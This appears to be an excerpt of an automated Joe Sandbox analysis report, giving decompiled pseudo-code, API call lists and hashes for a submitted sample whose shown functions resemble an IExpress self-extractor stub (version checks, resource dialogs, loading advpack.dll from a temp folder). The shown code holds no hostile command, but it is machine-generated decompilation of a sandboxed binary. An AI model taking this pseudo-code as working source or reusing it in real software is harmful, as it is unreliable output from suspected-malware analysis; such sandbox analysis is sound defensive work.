                                                                                                                                                                                                      								goto L30;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							__eflags = _t91;
                                                                                                                                                                                                      							_t107 = _v416.dwBuildNumber;
                                                                                                                                                                                                      							if(_t91 != 0) {
                                                                                                                                                                                                      								_t131 = _v424;
                                                                                                                                                                                                      								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                                                                                                                                                      								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                                                                                                                                                      									goto L37;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								goto L28;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t132 = _t107 & 0x0000ffff;
                                                                                                                                                                                                      							_t109 = _v424;
                                                                                                                                                                                                      							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                                                                                                                                                      							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                                                                                                                                                      								goto L28;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                                                                                                                                                      							goto L27;
                                                                                                                                                                                                      							L33:
                                                                                                                                                                                                      							_t135 =  &(_t135[1]);
                                                                                                                                                                                                      							_v428 = _t135;
                                                                                                                                                                                                      							_v420 = _t135;
                                                                                                                                                                                                      							__eflags = _t135 - 2;
                                                                                                                                                                                                      						} while (_t135 < 2);
                                                                                                                                                                                                      						goto L36;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					__eflags = _t77 == 1;
                                                                                                                                                                                                      					if(_t77 == 1) {
                                                                                                                                                                                                      						 *0xe79a40 = _t119;
                                                                                                                                                                                                      						 *0xe78184 = 1;
                                                                                                                                                                                                      						 *0xe78180 = 1;
                                                                                                                                                                                                      						__eflags = _t133 - 3;
                                                                                                                                                                                                      						if(_t133 > 3) {
                                                                                                                                                                                                      							__eflags = _t133 - 5;
                                                                                                                                                                                                      							if(_t133 < 5) {
                                                                                                                                                                                                      								goto L14;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t113 = 3;
                                                                                                                                                                                                      							_t119 = _t113;
                                                                                                                                                                                                      							goto L13;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t119 = 1;
                                                                                                                                                                                                      						_t114 = 3;
                                                                                                                                                                                                      						 *0xe79a40 = 1;
                                                                                                                                                                                                      						__eflags = _t133 - _t114;
                                                                                                                                                                                                      						if(__eflags < 0) {
                                                                                                                                                                                                      							L9:
                                                                                                                                                                                                      							 *0xe78184 = _t135;
                                                                                                                                                                                                      							 *0xe78180 = _t135;
                                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						if(__eflags != 0) {
                                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						__eflags = _v416.dwMinorVersion - 0x33;
                                                                                                                                                                                                      						if(_v416.dwMinorVersion >= 0x33) {
                                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						goto L9;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t138 = 0x4ca;
                                                                                                                                                                                                      					goto L44;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t138 = 0x4b4;
                                                                                                                                                                                                      					L44:
                                                                                                                                                                                                      					_push(_t135);
                                                                                                                                                                                                      					_push(0x10);
                                                                                                                                                                                                      					_push(_t135);
                                                                                                                                                                                                      					_push(_t135);
                                                                                                                                                                                                      					L65:
                                                                                                                                                                                                      					_t133 = _t138;
                                                                                                                                                                                                      					E00E744B9(0, _t138);
                                                                                                                                                                                                      					L66:
                                                                                                                                                                                                      					return E00E76CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}





































                                                                                                                                                                                                      0x00e736f9
                                                                                                                                                                                                      0x00e73700
                                                                                                                                                                                                      0x00e7370c
                                                                                                                                                                                                      0x00e73716
                                                                                                                                                                                                      0x00e73718
                                                                                                                                                                                                      0x00e7371b
                                                                                                                                                                                                      0x00e73721
                                                                                                                                                                                                      0x00e7372b
                                                                                                                                                                                                      0x00e7373d
                                                                                                                                                                                                      0x00e73745
                                                                                                                                                                                                      0x00e73746
                                                                                                                                                                                                      0x00e73746
                                                                                                                                                                                                      0x00e73749
                                                                                                                                                                                                      0x00e737ab
                                                                                                                                                                                                      0x00e737ad
                                                                                                                                                                                                      0x00e737ae
                                                                                                                                                                                                      0x00e737b3
                                                                                                                                                                                                      0x00e737b8
                                                                                                                                                                                                      0x00e737b8
                                                                                                                                                                                                      0x00e737bf
                                                                                                                                                                                                      0x00e737bf
                                                                                                                                                                                                      0x00e737c5
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e737cb
                                                                                                                                                                                                      0x00e737cd
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e737d5
                                                                                                                                                                                                      0x00e737db
                                                                                                                                                                                                      0x00e737e8
                                                                                                                                                                                                      0x00e737ea
                                                                                                                                                                                                      0x00e737ea
                                                                                                                                                                                                      0x00e737ea
                                                                                                                                                                                                      0x00e737f0
                                                                                                                                                                                                      0x00e737f6
                                                                                                                                                                                                      0x00e73805
                                                                                                                                                                                                      0x00e73817
                                                                                                                                                                                                      0x00e7382b
                                                                                                                                                                                                      0x00e73830
                                                                                                                                                                                                      0x00e73836
                                                                                                                                                                                                      0x00e7383b
                                                                                                                                                                                                      0x00e7383d
                                                                                                                                                                                                      0x00e738eb
                                                                                                                                                                                                      0x00e738eb
                                                                                                                                                                                                      0x00e738f2
                                                                                                                                                                                                      0x00e7390c
                                                                                                                                                                                                      0x00e73911
                                                                                                                                                                                                      0x00e73911
                                                                                                                                                                                                      0x00e73913
                                                                                                                                                                                                      0x00e7394d
                                                                                                                                                                                                      0x00e7394d
                                                                                                                                                                                                      0x00e7394f
                                                                                                                                                                                                      0x00e738a9
                                                                                                                                                                                                      0x00e738a9
                                                                                                                                                                                                      0x00e738b0
                                                                                                                                                                                                      0x00e738b2
                                                                                                                                                                                                      0x00e738b9
                                                                                                                                                                                                      0x00e738bb
                                                                                                                                                                                                      0x00e738c1
                                                                                                                                                                                                      0x00e73975
                                                                                                                                                                                                      0x00e738c7
                                                                                                                                                                                                      0x00e738de
                                                                                                                                                                                                      0x00e738e0
                                                                                                                                                                                                      0x00e738e0
                                                                                                                                                                                                      0x00e7397b
                                                                                                                                                                                                      0x00e7397d
                                                                                                                                                                                                      0x00e739a9
                                                                                                                                                                                                      0x00e7397f
                                                                                                                                                                                                      0x00e73982
                                                                                                                                                                                                      0x00e7398b
                                                                                                                                                                                                      0x00e7398d
                                                                                                                                                                                                      0x00e7398f
                                                                                                                                                                                                      0x00e7399f
                                                                                                                                                                                                      0x00e739a1
                                                                                                                                                                                                      0x00e73991
                                                                                                                                                                                                      0x00e73991
                                                                                                                                                                                                      0x00e73991
                                                                                                                                                                                                      0x00e7398f
                                                                                                                                                                                                      0x00e739af
                                                                                                                                                                                                      0x00e739b6
                                                                                                                                                                                                      0x00e73a0f
                                                                                                                                                                                                      0x00e73a0f
                                                                                                                                                                                                      0x00e73a11
                                                                                                                                                                                                      0x00e73a13
                                                                                                                                                                                                      0x00e73a19
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e739b8
                                                                                                                                                                                                      0x00e739b8
                                                                                                                                                                                                      0x00e739ba
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e739bc
                                                                                                                                                                                                      0x00e739bf
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e739c3
                                                                                                                                                                                                      0x00e739c9
                                                                                                                                                                                                      0x00e739ce
                                                                                                                                                                                                      0x00e739d0
                                                                                                                                                                                                      0x00e739e3
                                                                                                                                                                                                      0x00e739e5
                                                                                                                                                                                                      0x00e739e6
                                                                                                                                                                                                      0x00e739f1
                                                                                                                                                                                                      0x00e739f7
                                                                                                                                                                                                      0x00e739fa
                                                                                                                                                                                                      0x00e73a01
                                                                                                                                                                                                      0x00e73a04
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73a06
                                                                                                                                                                                                      0x00e73a09
                                                                                                                                                                                                      0x00e73a09
                                                                                                                                                                                                      0x00e73a0b
                                                                                                                                                                                                      0x00e73a0b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73a09
                                                                                                                                                                                                      0x00e739fc
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e739fc
                                                                                                                                                                                                      0x00e739d3
                                                                                                                                                                                                      0x00e739d8
                                                                                                                                                                                                      0x00e739da
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e739dc
                                                                                                                                                                                                      0x00e739b6
                                                                                                                                                                                                      0x00e73955
                                                                                                                                                                                                      0x00e7395b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73961
                                                                                                                                                                                                      0x00e73963
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73969
                                                                                                                                                                                                      0x00e73969
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73969
                                                                                                                                                                                                      0x00e73915
                                                                                                                                                                                                      0x00e73915
                                                                                                                                                                                                      0x00e7391b
                                                                                                                                                                                                      0x00e7391f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7392d
                                                                                                                                                                                                      0x00e73933
                                                                                                                                                                                                      0x00e73938
                                                                                                                                                                                                      0x00e7393a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73940
                                                                                                                                                                                                      0x00e73946
                                                                                                                                                                                                      0x00e7394b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7394b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e738f2
                                                                                                                                                                                                      0x00e73843
                                                                                                                                                                                                      0x00e73845
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7384b
                                                                                                                                                                                                      0x00e7384d
                                                                                                                                                                                                      0x00e73883
                                                                                                                                                                                                      0x00e73885
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7389a
                                                                                                                                                                                                      0x00e7389e
                                                                                                                                                                                                      0x00e7389e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e738a0
                                                                                                                                                                                                      0x00e738a0
                                                                                                                                                                                                      0x00e738a2
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e738a4
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e738a4
                                                                                                                                                                                                      0x00e7384f
                                                                                                                                                                                                      0x00e73851
                                                                                                                                                                                                      0x00e73857
                                                                                                                                                                                                      0x00e7386e
                                                                                                                                                                                                      0x00e73877
                                                                                                                                                                                                      0x00e7387b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73881
                                                                                                                                                                                                      0x00e73859
                                                                                                                                                                                                      0x00e7385c
                                                                                                                                                                                                      0x00e73862
                                                                                                                                                                                                      0x00e73866
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73868
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e738f4
                                                                                                                                                                                                      0x00e738f4
                                                                                                                                                                                                      0x00e738f5
                                                                                                                                                                                                      0x00e738fb
                                                                                                                                                                                                      0x00e73901
                                                                                                                                                                                                      0x00e73901
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7390a
                                                                                                                                                                                                      0x00e7374b
                                                                                                                                                                                                      0x00e7374e
                                                                                                                                                                                                      0x00e7375c
                                                                                                                                                                                                      0x00e73764
                                                                                                                                                                                                      0x00e73769
                                                                                                                                                                                                      0x00e7376e
                                                                                                                                                                                                      0x00e73771
                                                                                                                                                                                                      0x00e7379c
                                                                                                                                                                                                      0x00e7379f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e737a3
                                                                                                                                                                                                      0x00e737a4
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e737a4
                                                                                                                                                                                                      0x00e73773
                                                                                                                                                                                                      0x00e73777
                                                                                                                                                                                                      0x00e73778
                                                                                                                                                                                                      0x00e7377f
                                                                                                                                                                                                      0x00e73781
                                                                                                                                                                                                      0x00e7378e
                                                                                                                                                                                                      0x00e7378e
                                                                                                                                                                                                      0x00e73794
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73794
                                                                                                                                                                                                      0x00e73783
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73785
                                                                                                                                                                                                      0x00e7378c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7378c
                                                                                                                                                                                                      0x00e73750
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7372d
                                                                                                                                                                                                      0x00e7372d
                                                                                                                                                                                                      0x00e7396b
                                                                                                                                                                                                      0x00e7396b
                                                                                                                                                                                                      0x00e7396c
                                                                                                                                                                                                      0x00e7396e
                                                                                                                                                                                                      0x00e7396f
                                                                                                                                                                                                      0x00e73a1e
                                                                                                                                                                                                      0x00e73a1e
                                                                                                                                                                                                      0x00e73a22
                                                                                                                                                                                                      0x00e73a27
                                                                                                                                                                                                      0x00e73a3e
                                                                                                                                                                                                      0x00e73a3e

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00E73723
                                                                                                                                                                                                      • MessageBeep.USER32(00000000), ref: 00E739C3
                                                                                                                                                                                                      • MessageBoxA.USER32(00000000,00000000,cent,00000030), ref: 00E739F1
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Message$BeepVersion
                                                                                                                                                                                                      • String ID: 3$cent
                                                                                                                                                                                                      • API String ID: 2519184315-3438608206
                                                                                                                                                                                                      • Opcode ID: 476fdefc1b0c2c45e71f22b187fb67f08b3cfb8cb4d1868d2ac1f0079a976802
                                                                                                                                                                                                      • Instruction ID: ca819fc4c658403e2bbd5b4ea67bd8a4e1d3df6940e1d0af56459cc25a30d4b1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 476fdefc1b0c2c45e71f22b187fb67f08b3cfb8cb4d1868d2ac1f0079a976802
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 56910771A012159FEBB8CB35CD817EA73B0EB85308F1590AAD94DB7295D7708F81EB01
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 78%
                                                                                                                                                                                                      			E00E76517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, char _a16) {
                                                                                                                                                                                                      				struct HRSRC__* _t6;
                                                                                                                                                                                                      				void* _t21;
                                                                                                                                                                                                      				struct HINSTANCE__* _t23;
                                                                                                                                                                                                      				int _t24;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t23 =  *0xe79a3c; // 0xe70000
                                                                                                                                                                                                      				_t6 = FindResourceA(_t23, __edx, 5);
                                                                                                                                                                                                      				if(_t6 == 0) {
                                                                                                                                                                                                      					L6:
                                                                                                                                                                                                      					E00E744B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					_t5 =  &_a16; // 0xe72ee8
                                                                                                                                                                                                      					_t24 =  *_t5;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t21 = LoadResource(_t23, _t6);
                                                                                                                                                                                                      					if(_t21 == 0) {
                                                                                                                                                                                                      						goto L6;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						if(_a12 != 0) {
                                                                                                                                                                                                      							_push(_a12);
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                                                                                                                                                      						FreeResource(_t21);
                                                                                                                                                                                                      						if(_t24 == 0xffffffff) {
                                                                                                                                                                                                      							goto L6;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t24;
                                                                                                                                                                                                      			}







                                                                                                                                                                                                      0x00e7651f
                                                                                                                                                                                                      0x00e7652a
                                                                                                                                                                                                      0x00e76534
                                                                                                                                                                                                      0x00e7656b
                                                                                                                                                                                                      0x00e76577
                                                                                                                                                                                                      0x00e7657c
                                                                                                                                                                                                      0x00e7657c
                                                                                                                                                                                                      0x00e76536
                                                                                                                                                                                                      0x00e7653e
                                                                                                                                                                                                      0x00e76542
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e76544
                                                                                                                                                                                                      0x00e76547
                                                                                                                                                                                                      0x00e7654c
                                                                                                                                                                                                      0x00e76549
                                                                                                                                                                                                      0x00e76549
                                                                                                                                                                                                      0x00e76549
                                                                                                                                                                                                      0x00e7655e
                                                                                                                                                                                                      0x00e76560
                                                                                                                                                                                                      0x00e76569
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e76569
                                                                                                                                                                                                      0x00e76542
                                                                                                                                                                                                      0x00e76587

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • FindResourceA.KERNEL32(00E70000,000007D6,00000005), ref: 00E7652A
                                                                                                                                                                                                      • LoadResource.KERNEL32(00E70000,00000000,?,?,00E72EE8,00000000,00E719E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00E76538
                                                                                                                                                                                                      • DialogBoxIndirectParamA.USER32(00E70000,00000000,00000547,00E719E0,00000000), ref: 00E76557
                                                                                                                                                                                                      • FreeResource.KERNEL32(00000000,?,?,00E72EE8,00000000,00E719E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00E76560
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                      • String ID: .
                                                                                                                                                                                                      • API String ID: 1214682469-1603360339
                                                                                                                                                                                                      • Opcode ID: 99bd320feec59af0dbe714acbb4a04e52f1fb97d8d2dbcafa9ac365e67a3e649
                                                                                                                                                                                                      • Instruction ID: 1715147a363d770be4d996cd9319f91e6bf3c12782c7e35e5d221b1987f7b408
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 99bd320feec59af0dbe714acbb4a04e52f1fb97d8d2dbcafa9ac365e67a3e649
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 79012672100A05BFDB109F6A9C08DBB7A6CEBC5769F084525FE18B3194D7718C50EAA1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 83%
                                                                                                                                                                                                      			E00E76495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				signed int _t9;
                                                                                                                                                                                                      				signed char _t14;
                                                                                                                                                                                                      				struct HINSTANCE__* _t15;
                                                                                                                                                                                                      				void* _t18;
                                                                                                                                                                                                      				CHAR* _t26;
                                                                                                                                                                                                      				void* _t27;
                                                                                                                                                                                                      				signed int _t28;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t27 = __esi;
                                                                                                                                                                                                      				_t18 = __ebx;
                                                                                                                                                                                                      				_t9 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				_v8 = _t9 ^ _t28;
                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                      				E00E71781( &_v268, 0x104, __ecx, "C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                      				_t26 = "advpack.dll";
                                                                                                                                                                                                      				E00E7658A( &_v268, 0x104, _t26);
                                                                                                                                                                                                      				_t14 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                      				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                                                                                                                                                      					_t15 = LoadLibraryA(_t26);
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E00E76CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                                                                                                                                                      			}













                                                                                                                                                                                                      0x00e76495
                                                                                                                                                                                                      0x00e76495
                                                                                                                                                                                                      0x00e764a0
                                                                                                                                                                                                      0x00e764a7
                                                                                                                                                                                                      0x00e764ab
                                                                                                                                                                                                      0x00e764bd
                                                                                                                                                                                                      0x00e764c2
                                                                                                                                                                                                      0x00e764d3
                                                                                                                                                                                                      0x00e764df
                                                                                                                                                                                                      0x00e764e8
                                                                                                                                                                                                      0x00e76502
                                                                                                                                                                                                      0x00e764ee
                                                                                                                                                                                                      0x00e764f9
                                                                                                                                                                                                      0x00e764f9
                                                                                                                                                                                                      0x00e76516

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00E764DF
                                                                                                                                                                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00E764F9
                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00E76502
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
                                                                                                                                                                                                      • API String ID: 438848745-2381869747
                                                                                                                                                                                                      • Opcode ID: 5862d62734724dc7467628ee6cdadfa86f3dcd7ea8ab668d748c8b9a455350e7
                                                                                                                                                                                                      • Instruction ID: 6e8fe822de5247470f5a593a548dfd7e8fac9ded3b2039f7b5f0faa99be82a09
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5862d62734724dc7467628ee6cdadfa86f3dcd7ea8ab668d748c8b9a455350e7
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8701D6706001089FDB10DB75EC49AEE7378EB90315F9055A5F58DB21C0DF709EC98A51
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 32%
                                                                                                                                                                                                      			E00E74169(void* __eflags) {
                                                                                                                                                                                                      				int _t18;
                                                                                                                                                                                                      				void* _t21;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t20 = E00E7468F("FINISHMSG", 0, 0);
                                                                                                                                                                                                      				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                                                                                                                                                      				if(_t21 != 0) {
                                                                                                                                                                                                      					if(E00E7468F("FINISHMSG", _t21, _t20) != 0) {
                                                                                                                                                                                                      						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                                                                                                                                                      							L7:
                                                                                                                                                                                                      							return LocalFree(_t21);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_push(0);
                                                                                                                                                                                                      						_push(0x40);
                                                                                                                                                                                                      						_push(0);
                                                                                                                                                                                                      						_push(_t21);
                                                                                                                                                                                                      						_t18 = 0x3e9;
                                                                                                                                                                                                      						L6:
                                                                                                                                                                                                      						E00E744B9(0, _t18);
                                                                                                                                                                                                      						goto L7;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					_push(0x10);
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					_t18 = 0x4b1;
                                                                                                                                                                                                      					goto L6;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E00E744B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                      			}





                                                                                                                                                                                                      0x00e7417d
                                                                                                                                                                                                      0x00e7418f
                                                                                                                                                                                                      0x00e74193
                                                                                                                                                                                                      0x00e741b7
                                                                                                                                                                                                      0x00e741d3
                                                                                                                                                                                                      0x00e741e6
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e741e7
                                                                                                                                                                                                      0x00e741d5
                                                                                                                                                                                                      0x00e741d6
                                                                                                                                                                                                      0x00e741d8
                                                                                                                                                                                                      0x00e741d9
                                                                                                                                                                                                      0x00e741da
                                                                                                                                                                                                      0x00e741df
                                                                                                                                                                                                      0x00e741e1
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e741e1
                                                                                                                                                                                                      0x00e741b9
                                                                                                                                                                                                      0x00e741ba
                                                                                                                                                                                                      0x00e741bc
                                                                                                                                                                                                      0x00e741bd
                                                                                                                                                                                                      0x00e741be
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e741be
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00E7468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E746A0
                                                                                                                                                                                                        • Part of subcall function 00E7468F: SizeofResource.KERNEL32(00000000,00000000,?,00E72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746A9
                                                                                                                                                                                                        • Part of subcall function 00E7468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E746C3
                                                                                                                                                                                                        • Part of subcall function 00E7468F: LoadResource.KERNEL32(00000000,00000000,?,00E72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746CC
                                                                                                                                                                                                        • Part of subcall function 00E7468F: LockResource.KERNEL32(00000000,?,00E72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746D3
                                                                                                                                                                                                        • Part of subcall function 00E7468F: memcpy_s.MSVCRT ref: 00E746E5
